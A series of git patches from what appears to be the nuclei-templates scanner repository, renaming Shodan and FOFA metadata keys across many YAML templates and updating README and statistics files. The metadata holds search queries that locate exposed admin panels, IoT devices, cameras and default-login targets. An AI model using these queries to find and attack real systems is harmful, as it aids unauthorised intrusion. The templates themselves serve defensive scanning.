e9d7abbcf2..5934bf4ae0 100644 --- a/exposed-panels/alienvault-usm.yaml +++ b/exposed-panels/alienvault-usm.yaml @@ -6,7 +6,7 @@ info: severity: info tags: panel metadata: - shodan: 'http.title:"AlienVault USM"' + shodan-query: 'http.title:"AlienVault USM"' requests: - method: GET diff --git a/exposed-panels/cisco/cisco-ace-device-manager.yaml b/exposed-panels/cisco/cisco-ace-device-manager.yaml index 4526ed7920..09704c579f 100644 --- a/exposed-panels/cisco/cisco-ace-device-manager.yaml +++ b/exposed-panels/cisco/cisco-ace-device-manager.yaml @@ -6,7 +6,7 @@ info: severity: info tags: panel,cisco metadata: - shodan: 'html:"ACE 4710 Device Manager"' + shodan-query: 'html:"ACE 4710 Device Manager"' requests: - method: GET diff --git a/exposed-panels/cisco/cisco-edge-340.yaml b/exposed-panels/cisco/cisco-edge-340.yaml index 53bf0929b2..17a60b6a18 100644 --- a/exposed-panels/cisco/cisco-edge-340.yaml +++ b/exposed-panels/cisco/cisco-edge-340.yaml @@ -6,7 +6,7 @@ info: severity: info tags: panel,cisco metadata: - shodan: 'http.title:"Cisco Edge 340"' + shodan-query: 'http.title:"Cisco Edge 340"' requests: - method: GET diff --git a/exposed-panels/cisco/cisco-secure-cn.yaml b/exposed-panels/cisco/cisco-secure-cn.yaml index 034c6857b0..6914a5cc7e 100644 --- a/exposed-panels/cisco/cisco-secure-cn.yaml +++ b/exposed-panels/cisco/cisco-secure-cn.yaml @@ -6,7 +6,7 @@ info: severity: info tags: panel,cisco metadata: - shodan: 'http.title:"Cisco Secure CN"' + shodan-query: 'http.title:"Cisco Secure CN"' requests: - method: GET diff --git a/exposed-panels/cisco/cisco-systems-login.yaml b/exposed-panels/cisco/cisco-systems-login.yaml index ab274c92c5..25607b3bbf 100644 --- a/exposed-panels/cisco/cisco-systems-login.yaml +++ b/exposed-panels/cisco/cisco-systems-login.yaml @@ -6,7 +6,7 @@ info: severity: info tags: panel,cisco metadata: - shodan: 'http.title:"Cisco Systems Login"' + shodan-query: 'http.title:"Cisco Systems Login"' requests: - method: GET diff --git a/exposed-panels/cisco/cisco-telepresence.yaml b/exposed-panels/cisco/cisco-telepresence.yaml index 16440be020..adc3eca85a 100644 --- a/exposed-panels/cisco/cisco-telepresence.yaml +++ b/exposed-panels/cisco/cisco-telepresence.yaml @@ -6,7 +6,7 @@ info: severity: info tags: panel,cisco metadata: - shodan: 'http.title:"Cisco Telepresence"' + shodan-query: 'http.title:"Cisco Telepresence"' requests: - method: GET diff --git a/exposed-panels/cloudphysician-radar.yaml b/exposed-panels/cloudphysician-radar.yaml index 78c1fcc81b..a27879d61e 100644 --- a/exposed-panels/cloudphysician-radar.yaml +++ b/exposed-panels/cloudphysician-radar.yaml @@ -7,7 +7,7 @@ info: reference: https://www.exploit-db.com/ghdb/7466 tags: panel metadata: - shodan: 'http.title:"Cloudphysician RADAR"' + shodan-query: 'http.title:"Cloudphysician RADAR"' requests: - method: GET diff --git a/exposed-panels/dericam-login.yaml b/exposed-panels/dericam-login.yaml index ff62ebc226..6dbfec5896 100644 --- a/exposed-panels/dericam-login.yaml +++ b/exposed-panels/dericam-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: https://www.exploit-db.com/ghdb/7354 metadata: - shodan: 'http.title:"Dericam"' + shodan-query: 'http.title:"Dericam"' tags: panel requests: diff --git a/exposed-panels/exsi-system.yaml b/exposed-panels/exsi-system.yaml index 709f85f239..76368ee4f6 100644 --- a/exposed-panels/exsi-system.yaml +++ b/exposed-panels/exsi-system.yaml @@ -6,7 +6,7 @@ info: severity: info tags: panel metadata: - shodan: 'html:"esxUiApp"' + shodan-query: 'html:"esxUiApp"' requests: - method: GET diff --git a/exposed-panels/fireware-xtm-user-authentication.yaml b/exposed-panels/fireware-xtm-user-authentication.yaml index 2f351d82e1..bc06461820 100644 --- a/exposed-panels/fireware-xtm-user-authentication.yaml +++ b/exposed-panels/fireware-xtm-user-authentication.yaml @@ -6,7 +6,7 @@ info: severity: info tags: panel metadata: - shodan: 'http.title:"Fireware XTM User Authentication"' + shodan-query: 'http.title:"Fireware XTM User Authentication"' requests: - method: GET diff --git a/exposed-panels/ibm-advanced-system-management.yaml b/exposed-panels/ibm-advanced-system-management.yaml index 4e1fe186df..7b80a2a8a6 100644 --- a/exposed-panels/ibm-advanced-system-management.yaml +++ b/exposed-panels/ibm-advanced-system-management.yaml @@ -6,7 +6,7 @@ info: severity: info tags: panel metadata: - shodan: 'http.title:"Advanced System Management"' + shodan-query: 'http.title:"Advanced System Management"' requests: - method: GET diff --git a/exposed-panels/ibm-service-assistant.yaml b/exposed-panels/ibm-service-assistant.yaml index 6048271ece..050371be3b 100644 --- a/exposed-panels/ibm-service-assistant.yaml +++ b/exposed-panels/ibm-service-assistant.yaml @@ -6,7 +6,7 @@ info: severity: info tags: panel metadata: - shodan: 'http.title:"Welcome to Service Assistant"' + shodan-query: 'http.title:"Welcome to Service Assistant"' requests: - method: GET diff --git a/exposed-panels/open-game-panel.yaml b/exposed-panels/open-game-panel.yaml index ee098682d0..52da36d063 100644 --- a/exposed-panels/open-game-panel.yaml +++ b/exposed-panels/open-game-panel.yaml @@ -6,7 +6,7 @@ info: severity: info reference: https://www.exploit-db.com/ghdb/7418 metadata: - shodan: 'http.title:"Open Game Panel"' + shodan-query: 'http.title:"Open Game Panel"' tags: panel requests: diff --git a/exposed-panels/project-insight-login.yaml b/exposed-panels/project-insight-login.yaml index 7b46bccaa3..d0f55c8e2f 100644 --- a/exposed-panels/project-insight-login.yaml +++ b/exposed-panels/project-insight-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: https://www.exploit-db.com/ghdb/7413 metadata: - shodan: 'http.title:"Project Insight - Login"' + shodan-query: 'http.title:"Project Insight - Login"' tags: panel requests: diff --git a/exposed-panels/sql-monitor.yaml b/exposed-panels/sql-monitor.yaml index d736a98730..e9b23658ed 100644 --- a/exposed-panels/sql-monitor.yaml +++ b/exposed-panels/sql-monitor.yaml @@ -6,7 +6,7 @@ info: severity: info tags: panel metadata: - shodan: 'html:"SQL Monitor"' + shodan-query: 'html:"SQL Monitor"' requests: - method: GET diff --git a/exposed-panels/squirrelmail-login.yaml b/exposed-panels/squirrelmail-login.yaml index 64716573ef..d8dc1a1d2c 100644 --- a/exposed-panels/squirrelmail-login.yaml +++ b/exposed-panels/squirrelmail-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: https://www.exploit-db.com/ghdb/7407 metadata: - shodan: 'http.title:"SquirrelMail - Login"' + shodan-query: 'http.title:"SquirrelMail - Login"' tags: panel requests: diff --git a/exposed-panels/zimbra-web-client.yaml b/exposed-panels/zimbra-web-client.yaml index 121f98e6b7..27299eb160 100644 --- a/exposed-panels/zimbra-web-client.yaml +++ b/exposed-panels/zimbra-web-client.yaml @@ -6,7 +6,7 @@ info: severity: info reference: https://www.exploit-db.com/ghdb/7409 metadata: - shodan: 'http.title:"Zimbra Web Client Sign In"' + shodan-query: 'http.title:"Zimbra Web Client Sign In"' tags: panel requests: diff --git a/iot/codian-mcu-login.yaml b/iot/codian-mcu-login.yaml index 56f05a6e19..0299bf2888 100644 --- a/iot/codian-mcu-login.yaml +++ b/iot/codian-mcu-login.yaml @@ -7,7 +7,7 @@ info: reference: https://www.exploit-db.com/ghdb/7404 tags: iot metadata: - shodan: 'http.title:"Codian MCU - Home page"' + shodan-query: 'http.title:"Codian MCU - Home page"' requests: - method: GET diff --git a/iot/envision-gateway.yaml b/iot/envision-gateway.yaml index fb1440730d..a4a08daf9e 100644 --- a/iot/envision-gateway.yaml +++ b/iot/envision-gateway.yaml @@ -7,7 +7,7 @@ info: reference: https://www.exploit-db.com/ghdb/7315 tags: iot metadata: - shodan: 'http.title:"EnvisionGateway"' + shodan-query: 'http.title:"EnvisionGateway"' requests: - method: GET diff --git a/iot/grandstream-device-configuration.yaml b/iot/grandstream-device-configuration.yaml index cda2b2900f..04c36dabe7 100644 --- a/iot/grandstream-device-configuration.yaml +++ b/iot/grandstream-device-configuration.yaml @@ -6,7 +6,7 @@ info: severity: info tags: iot metadata: - shodan: 'http.title:"Grandstream Device Configuration"' + shodan-query: 'http.title:"Grandstream Device Configuration"' requests: - method: GET diff --git a/iot/heatmiser-wifi-thermostat.yaml b/iot/heatmiser-wifi-thermostat.yaml index 3426a7ebf4..a6881d64e0 100644 --- a/iot/heatmiser-wifi-thermostat.yaml +++ b/iot/heatmiser-wifi-thermostat.yaml @@ -7,7 +7,7 @@ info: reference: https://www.exploit-db.com/ghdb/7445 tags: iot metadata: - shodan: 'http.title:"Heatmiser Wifi Thermostat"' + shodan-query: 'http.title:"Heatmiser Wifi Thermostat"' requests: - method: GET diff --git a/iot/honeywell-building-control.yaml b/iot/honeywell-building-control.yaml index 8692bf4946..8832b78bc9 100644 --- a/iot/honeywell-building-control.yaml +++ b/iot/honeywell-building-control.yaml @@ -6,7 +6,7 @@ info: severity: info tags: panel,iot metadata: - shodan: 'html:"Honeywell Building Control"' + shodan-query: 'html:"Honeywell Building Control"' requests: - method: GET diff --git a/iot/huawei-home-gateway.yaml b/iot/huawei-home-gateway.yaml index f8e0545182..fc0e0ac5c0 100644 --- a/iot/huawei-home-gateway.yaml +++ b/iot/huawei-home-gateway.yaml @@ -6,7 +6,7 @@ info: severity: info tags: iot metadata: - shodan: 'http.title:"HUAWEI Home Gateway HG658d"' + shodan-query: 'http.title:"HUAWEI Home Gateway HG658d"' requests: - method: GET diff --git a/iot/routeros-login.yaml b/iot/routeros-login.yaml index 809a65432a..e2c89bee5d 100644 --- a/iot/routeros-login.yaml +++ b/iot/routeros-login.yaml @@ -6,7 +6,7 @@ info: severity: info tags: panel metadata: - shodan: 'http.title:"RouterOS router configuration page"' + shodan-query: 'http.title:"RouterOS router configuration page"' requests: - method: GET diff --git a/iot/webcamxp-5.yaml b/iot/webcamxp-5.yaml index 8b63f6cc6e..936494c4c8 100644 --- a/iot/webcamxp-5.yaml +++ b/iot/webcamxp-5.yaml @@ -7,7 +7,7 @@ info: reference: https://www.exploit-db.com/ghdb/7448 tags: iot metadata: - shodan: 'http.title:"webcamXP 5"' + shodan-query: 'http.title:"webcamXP 5"' requests: - method: GET diff --git a/iot/webtools-home.yaml b/iot/webtools-home.yaml index 2567498576..34af4f516a 100644 --- a/iot/webtools-home.yaml +++ b/iot/webtools-home.yaml @@ -6,7 +6,7 @@ info: severity: info tags: iot metadata: - shodan: 'http.title:"Webtools"' + shodan-query: 'http.title:"Webtools"' requests: - method: GET diff --git a/misconfiguration/jaeger-ui-dashboard.yaml b/misconfiguration/jaeger-ui-dashboard.yaml index 30b94cb5cc..82ce203e87 100644 --- a/misconfiguration/jaeger-ui-dashboard.yaml +++ b/misconfiguration/jaeger-ui-dashboard.yaml @@ -6,7 +6,7 @@ info: severity: low tags: misconfig metadata: - shodan: 'http.title:"Jaeger UI"' + shodan-query: 'http.title:"Jaeger UI"' requests: - method: GET From 2d5beca867b487e9e960f645719d30886494e4f6 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 22 Oct 2021 23:23:25 +0530 Subject: [PATCH 3106/4083] metadata update --- default-logins/abb/cs141-default-login.yaml | 2 +- default-logins/google/google-earth-dlogin.yaml | 2 +- exposed-panels/amcrest-login.yaml | 2 +- exposed-panels/intelbras-login.yaml | 2 +- iot/automation-direct.yaml | 2 +- iot/netsurveillance-web.yaml | 2 +- technologies/tileserver-gl.yaml | 2 +- vulnerabilities/other/bullwark-momentum-lfi.yaml | 2 +- vulnerabilities/other/sick-beard-xss.yaml | 2 +- 9 files changed, 9 insertions(+), 9 deletions(-) diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index af761abc88..92c18a864b 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -7,7 +7,7 @@ info: reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf tags: hiawatha,iot,default-login metadata: - shodan-dork: https://www.shodan.io/search?query=html%3A%22CS141%22 + shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22 requests: - raw: diff --git a/default-logins/google/google-earth-dlogin.yaml b/default-logins/google/google-earth-dlogin.yaml index 9826c42eb0..8e29091076 100644 --- a/default-logins/google/google-earth-dlogin.yaml +++ b/default-logins/google/google-earth-dlogin.yaml @@ -7,7 +7,7 @@ info: tags: default-login,google reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html metadata: - shodan-dork: 'title:"GEE Server"' + shodan-query: 'title:"GEE Server"' requests: - raw: diff --git a/exposed-panels/amcrest-login.yaml b/exposed-panels/amcrest-login.yaml index c481ebd0b3..f5c1e9646e 100644 --- a/exposed-panels/amcrest-login.yaml +++ b/exposed-panels/amcrest-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: https://www.exploit-db.com/ghdb/7273 metadata: - shodan-dork: html:"amcrest" + shodan-query: html:"amcrest" google-dork: intext:"amcrest" "LDAP User" tags: panel,camera diff --git a/exposed-panels/intelbras-login.yaml b/exposed-panels/intelbras-login.yaml index f3062f3fc1..480e982896 100644 --- a/exposed-panels/intelbras-login.yaml +++ b/exposed-panels/intelbras-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: https://www.exploit-db.com/ghdb/7272 metadata: - shodan-dork: http.title:"Intelbras" + shodan-query: http.title:"Intelbras" google-dork: intitle:"Intelbras" "All Rights Reserved" -.com tags: panel diff --git a/iot/automation-direct.yaml b/iot/automation-direct.yaml index 7e65eca012..5d97d8ae1d 100644 --- a/iot/automation-direct.yaml +++ b/iot/automation-direct.yaml @@ -6,7 +6,7 @@ info: severity: info reference: https://www.exploit-db.com/ghdb/7295 metadata: - shodan-dork: http.title:"C-more -- the best HMI presented by AutomationDirect" + shodan-query: http.title:"C-more -- the best HMI presented by AutomationDirect" google-dork: intitle:"C-more -- the best HMI presented by AutomationDirect" tags: panel,iot diff --git a/iot/netsurveillance-web.yaml b/iot/netsurveillance-web.yaml index 5f9b318655..a9d43b0a55 100644 --- a/iot/netsurveillance-web.yaml +++ b/iot/netsurveillance-web.yaml @@ -6,7 +6,7 @@ info: severity: info reference: https://www.exploit-db.com/ghdb/7288 metadata: - shodan-dork: http.title:"NETSurveillance WEB" + shodan-query: http.title:"NETSurveillance WEB" google-dork: intitle:"NETSurveillance WEB" tags: tech,iot diff --git a/technologies/tileserver-gl.yaml b/technologies/tileserver-gl.yaml index 934caa93ca..688c25aabd 100644 --- a/technologies/tileserver-gl.yaml +++ b/technologies/tileserver-gl.yaml @@ -6,7 +6,7 @@ info: severity: info reference: https://www.exploit-db.com/ghdb/7296 metadata: - shodan-dork: http.title:"TileServer GL - Server for vector and raster maps with GL styles" + shodan-query: http.title:"TileServer GL - Server for vector and raster maps with GL styles" google-dork: intitle:"TileServer GL - Server for vector and raster maps with GL styles" tags: tech diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index abe45ac827..e966133da4 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -10,7 +10,7 @@ info: - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link metadata: version: Bullwark Momentum Series Web Server JAWS/1.0 - shodan-dork: https://www.shodan.io/search?query=Bullwark&page=1 + shodan-query: https://www.shodan.io/search?query=Bullwark&page=1 fofa-dork: https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D tags: bullwark,lfi diff --git a/vulnerabilities/other/sick-beard-xss.yaml b/vulnerabilities/other/sick-beard-xss.yaml index 564e9bb618..41f8cba47a 100644 --- a/vulnerabilities/other/sick-beard-xss.yaml +++ b/vulnerabilities/other/sick-beard-xss.yaml @@ -9,7 +9,7 @@ info: - https://sickbeard.com/ # vendor homepage - https://github.com/midgetspy/Sick-Beard # software link metadata: - shodan-dork: sickbeard + shodan-query: sickbeard requests: - method: GET From c66ad46464fc6778039bb1150b40ee99923a6a68 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 22 Oct 2021 23:24:21 +0530 Subject: [PATCH 3107/4083] more metadata update --- default-logins/hp/hp-switch-default-login.yaml | 2 +- exposed-panels/minio-console-detect.yaml | 2 +- exposed-panels/samsung-printer-detect.yaml | 2 +- iot/iotawatt-app-exposure.yaml | 2 +- network/iplanet-imap-detect.yaml | 2 +- technologies/abyss-web-server.yaml | 2 +- technologies/hp-media-vault-detect.yaml | 2 +- technologies/iplanet-web-server.yaml | 2 +- technologies/kubernetes/kubernetes-enterprise-manager.yaml | 2 +- technologies/kubernetes/kubernetes-mirantis.yaml | 2 +- technologies/oracle/oracle-iplanet-web-server.yaml | 2 +- vulnerabilities/other/bullwark-momentum-lfi.yaml | 2 +- 12 files changed, 12 insertions(+), 12 deletions(-) diff --git a/default-logins/hp/hp-switch-default-login.yaml b/default-logins/hp/hp-switch-default-login.yaml index beada2b11a..1b5d3bd755 100644 --- a/default-logins/hp/hp-switch-default-login.yaml +++ b/default-logins/hp/hp-switch-default-login.yaml @@ -5,7 +5,7 @@ info: severity: high reference: https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US metadata: - fofa-dork: 'HP 1820-8G Switch J9979A' + fofa-query: 'HP 1820-8G Switch J9979A' tags: default-login,hp requests: diff --git a/exposed-panels/minio-console-detect.yaml b/exposed-panels/minio-console-detect.yaml index 7df3402d45..81f642876b 100644 --- a/exposed-panels/minio-console-detect.yaml +++ b/exposed-panels/minio-console-detect.yaml @@ -6,7 +6,7 @@ info: severity: info tags: panel,minio metadata: - fofa-dork: 'app="MinIO-Console"' + fofa-query: 'app="MinIO-Console"' requests: - method: GET diff --git a/exposed-panels/samsung-printer-detect.yaml b/exposed-panels/samsung-printer-detect.yaml index c4e1f09352..889015e329 100644 --- a/exposed-panels/samsung-printer-detect.yaml +++ b/exposed-panels/samsung-printer-detect.yaml @@ -6,7 +6,7 @@ info: severity: info tags: iot,panel metadata: - fofa-dork: 'app="SAMSUNG-Printer"' + fofa-query: 'app="SAMSUNG-Printer"' requests: - method: GET diff --git a/iot/iotawatt-app-exposure.yaml b/iot/iotawatt-app-exposure.yaml index 0353cfc645..3dda0a03f7 100644 --- a/iot/iotawatt-app-exposure.yaml +++ b/iot/iotawatt-app-exposure.yaml @@ -5,7 +5,7 @@ info: severity: high description: unauthenticated IoTaWatt energy monitor leads to upload to any of several third-party energy websites/database metadata: - fofa-dork: 'app="IoTaWatt-Configuration-app"' + fofa-query: 'app="IoTaWatt-Configuration-app"' tags: iot,exposure requests: diff --git a/network/iplanet-imap-detect.yaml b/network/iplanet-imap-detect.yaml index b07a370e39..abc5eeaec7 100644 --- a/network/iplanet-imap-detect.yaml +++ b/network/iplanet-imap-detect.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: info metadata: - fofa-dork: 'app="iPlanet-Messaging-Server-5.2" && protocol="imap"' + fofa-query: 'app="iPlanet-Messaging-Server-5.2" && protocol="imap"' tags: network,imap network: diff --git a/technologies/abyss-web-server.yaml b/technologies/abyss-web-server.yaml index 21b392d066..334f49e123 100644 --- a/technologies/abyss-web-server.yaml +++ b/technologies/abyss-web-server.yaml @@ -6,7 +6,7 @@ info: severity: info tags: tech metadata: - fofa-dork: 'app="Abyss-Web-Server"' + fofa-query: 'app="Abyss-Web-Server"' requests: - method: GET diff --git a/technologies/hp-media-vault-detect.yaml b/technologies/hp-media-vault-detect.yaml index cc099f1791..7c609a1bb3 100644 --- a/technologies/hp-media-vault-detect.yaml +++ b/technologies/hp-media-vault-detect.yaml @@ -4,7 +4,7 @@ info: author: pussycat0x severity: info metadata: - fofa-dork: 'app="HP-Media-Vault-Media-Server"' + fofa-query: 'app="HP-Media-Vault-Media-Server"' tags: tech,hp requests: diff --git a/technologies/iplanet-web-server.yaml b/technologies/iplanet-web-server.yaml index bd470068d7..c29f448425 100644 --- a/technologies/iplanet-web-server.yaml +++ b/technologies/iplanet-web-server.yaml @@ -6,7 +6,7 @@ info: severity: info tags: tech metadata: - fofa-dork: 'app="iPlanet-Web-Server,-Enterprise-Edition-4.1"' + fofa-query: 'app="iPlanet-Web-Server,-Enterprise-Edition-4.1"' requests: - method: GET diff --git a/technologies/kubernetes/kubernetes-enterprise-manager.yaml b/technologies/kubernetes/kubernetes-enterprise-manager.yaml index 57a51341a8..a8ddac8a7e 100644 --- a/technologies/kubernetes/kubernetes-enterprise-manager.yaml +++ b/technologies/kubernetes/kubernetes-enterprise-manager.yaml @@ -6,7 +6,7 @@ info: severity: info tags: tech,kubernetes metadata: - fofa-dork: 'app="Kubernetes-Enterprise-Manager"' + fofa-query: 'app="Kubernetes-Enterprise-Manager"' requests: - method: GET diff --git a/technologies/kubernetes/kubernetes-mirantis.yaml b/technologies/kubernetes/kubernetes-mirantis.yaml index b6cdbff813..d01d8dee7c 100644 --- a/technologies/kubernetes/kubernetes-mirantis.yaml +++ b/technologies/kubernetes/kubernetes-mirantis.yaml @@ -6,7 +6,7 @@ info: severity: info tags: tech,kubernetes metadata: - fofa-dork: 'app="Mirantis-Kubernetes-Engine"' + fofa-query: 'app="Mirantis-Kubernetes-Engine"' requests: - method: GET diff --git a/technologies/oracle/oracle-iplanet-web-server.yaml b/technologies/oracle/oracle-iplanet-web-server.yaml index 07d74c7cac..3fcb39ddbd 100644 --- a/technologies/oracle/oracle-iplanet-web-server.yaml +++ b/technologies/oracle/oracle-iplanet-web-server.yaml @@ -6,7 +6,7 @@ info: severity: info tags: tech,oracle metadata: - fofa-dork: 'app="Oracle-iPlanet-Web-Server' + fofa-query: 'app="Oracle-iPlanet-Web-Server' requests: - method: GET diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index e966133da4..e8dd1b7e11 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -11,7 +11,7 @@ info: metadata: version: Bullwark Momentum Series Web Server JAWS/1.0 shodan-query: https://www.shodan.io/search?query=Bullwark&page=1 - fofa-dork: https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D + fofa-query: https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D tags: bullwark,lfi requests: From 040157ef03ab13d0ca39727eefd7d33bf2548b44 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Oct 2021 17:59:24 +0000 Subject: [PATCH 3108/4083] Auto README Update [Fri Oct 22 17:59:24 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 9c53b7c938..bf87efc606 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 165 | madrobot | 63 | file | 50 | | | | | -**176 directories, 2382 files**. +**176 directories, 2416 files**. From 082c3d3758dc0cb2d1bca027544b45331cd36c19 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 22 Oct 2021 23:40:55 +0530 Subject: [PATCH 3109/4083] stats update --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1804 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 915 insertions(+), 911 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index d6eb666918..2041694d06 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":833},{"name":"lfi","count":342},{"name":"panel","count":272},{"name":"xss","count":258},{"name":"wordpress","count":252},{"name":"exposure","count":240},{"name":"rce","count":214},{"name":"tech","count":196},{"name":"wp-plugin","count":175},{"name":"cve2020","count":165},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":96},{"name":"cve2018","count":92},{"name":"apache","count":73},{"name":"iot","count":70},{"name":"takeover","count":69},{"name":"oast","count":69},{"name":"default-login","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":42},{"name":"sqli","count":40},{"name":"","count":38},{"name":"cve2016","count":37},{"name":"redirect","count":37},{"name":"oracle","count":36},{"name":"google","count":30},{"name":"logs","count":30},{"name":"cve2015","count":29},{"name":"atlassian","count":29},{"name":"jira","count":29},{"name":"cisco","count":27},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"misconfig","count":22},{"name":"router","count":22},{"name":"aem","count":19},{"name":"sap","count":18},{"name":"debug","count":18},{"name":"springboot","count":18},{"name":"cve2012","count":18},{"name":"php","count":16},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"cve2009","count":14},{"name":"weblogic","count":14},{"name":"login","count":14},{"name":"struts","count":14},{"name":"aws","count":14},{"name":"fuzz","count":14},{"name":"zoho","count":13},{"name":"deserialization","count":13},{"name":"android","count":13},{"name":"dlink","count":13},{"name":"dns","count":13},{"name":"adobe","count":13},{"name":"jenkins","count":12},{"name":"wp-theme","count":12},{"name":"manageengine","count":12},{"name":"magento","count":11},{"name":"cve2013","count":11},{"name":"dell","count":10},{"name":"intrusive","count":10},{"name":"xxe","count":10},{"name":"hp","count":10},{"name":"vmware","count":9},{"name":"ftp","count":9},{"name":"kubernetes","count":9},{"name":"fastjson","count":8},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"backup","count":8},{"name":"ruijie","count":8},{"name":"airflow","count":8},{"name":"cve2008","count":8},{"name":"nginx","count":8},{"name":"microsoft","count":8},{"name":"ibm","count":8},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"cms","count":7},{"name":"jetty","count":6},{"name":"camera","count":6},{"name":"citrix","count":6},{"name":"django","count":6},{"name":"nodejs","count":6},{"name":"rconfig","count":6},{"name":"api","count":6},{"name":"laravel","count":6},{"name":"phpmyadmin","count":6},{"name":"lucee","count":6},{"name":"docker","count":6},{"name":"fileupload","count":6},{"name":"solr","count":6},{"name":"drupal","count":6},{"name":"headless","count":5},{"name":"ssti","count":5},{"name":"dedecms","count":5},{"name":"jolokia","count":5},{"name":"crlf","count":5},{"name":"java","count":5},{"name":"windows","count":5},{"name":"tomcat","count":5},{"name":"circarlife","count":5},{"name":"iis","count":5},{"name":"printer","count":5},{"name":"fatpipe","count":4},{"name":"exchange","count":4},{"name":"zabbix","count":4},{"name":"asp","count":4},{"name":"rfi","count":4},{"name":"amazon","count":4},{"name":"grafana","count":4},{"name":"wso2","count":4},{"name":"hongdian","count":4},{"name":"thinkphp","count":4},{"name":"maps","count":4},{"name":"buffalo","count":4},{"name":"symfony","count":4},{"name":"vpn","count":4},{"name":"solarwinds","count":4},{"name":"firmware","count":4},{"name":"glpi","count":4},{"name":"zimbra","count":4},{"name":"proxy","count":4},{"name":"moodle","count":4},{"name":"symantec","count":4},{"name":"resin","count":4},{"name":"npm","count":4},{"name":"strapi","count":4},{"name":"artifactory","count":4},{"name":"slack","count":4},{"name":"magmi","count":4},{"name":"samsung","count":4},{"name":"git","count":4},{"name":"webserver","count":4},{"name":"firebase","count":4},{"name":"thinkcmf","count":4},{"name":"keycloak","count":4},{"name":"elastic","count":4},{"name":"traversal","count":4},{"name":"search","count":3},{"name":"ssh","count":3},{"name":"openssh","count":3},{"name":"vbulletin","count":3},{"name":"openam","count":3},{"name":"kafka","count":3},{"name":"smtp","count":3},{"name":"telerik","count":3},{"name":"kibana","count":3},{"name":"cloud","count":3},{"name":"zhiyuan","count":3},{"name":"backdoor","count":3},{"name":"lansweeper","count":3},{"name":"caucho","count":3},{"name":"fanruan","count":3},{"name":"cves","count":3},{"name":"jeesns","count":3},{"name":"log","count":3},{"name":"nexus","count":3},{"name":"cacti","count":3},{"name":"ofbiz","count":3},{"name":"oa","count":3},{"name":"tikiwiki","count":3},{"name":"azure","count":3},{"name":"jellyfin","count":3},{"name":"r-seenet","count":3},{"name":"terramaster","count":3},{"name":"github","count":3},{"name":"lfr","count":3},{"name":"hoteldruid","count":3},{"name":"kevinlab","count":3},{"name":"httpd","count":3},{"name":"opensis","count":3},{"name":"springcloud","count":3},{"name":"nosqli","count":3},{"name":"linkerd","count":3},{"name":"injection","count":3},{"name":"nacos","count":3},{"name":"microstrategy","count":3},{"name":"node","count":3},{"name":"exposures","count":3},{"name":"fpd","count":3},{"name":"prometheus","count":3},{"name":"itop","count":3},{"name":"bitrix","count":3},{"name":"targa","count":3},{"name":"druid","count":3},{"name":"mongodb","count":3},{"name":"ebs","count":3},{"name":"bigip","count":3},{"name":"mail","count":3},{"name":"cve2007","count":3},{"name":"aviatrix","count":2},{"name":"icewarp","count":2},{"name":"yapi","count":2},{"name":"webcam","count":2},{"name":"chyrp","count":2},{"name":"paloalto","count":2},{"name":"prtg","count":2},{"name":"voipmonitor","count":2},{"name":"mailchimp","count":2},{"name":"idrac","count":2},{"name":"text","count":2},{"name":"bitly","count":2},{"name":"nagios","count":2},{"name":"fortios","count":2},{"name":"upload","count":2},{"name":"commax","count":2},{"name":"odoo","count":2},{"name":"dolibarr","count":2},{"name":"activemq","count":2},{"name":"maian","count":2},{"name":"globalprotect","count":2},{"name":"openvpn","count":2},{"name":"ilo","count":2},{"name":"netis","count":2},{"name":"hasura","count":2},{"name":"hostheader-injection","count":2},{"name":"f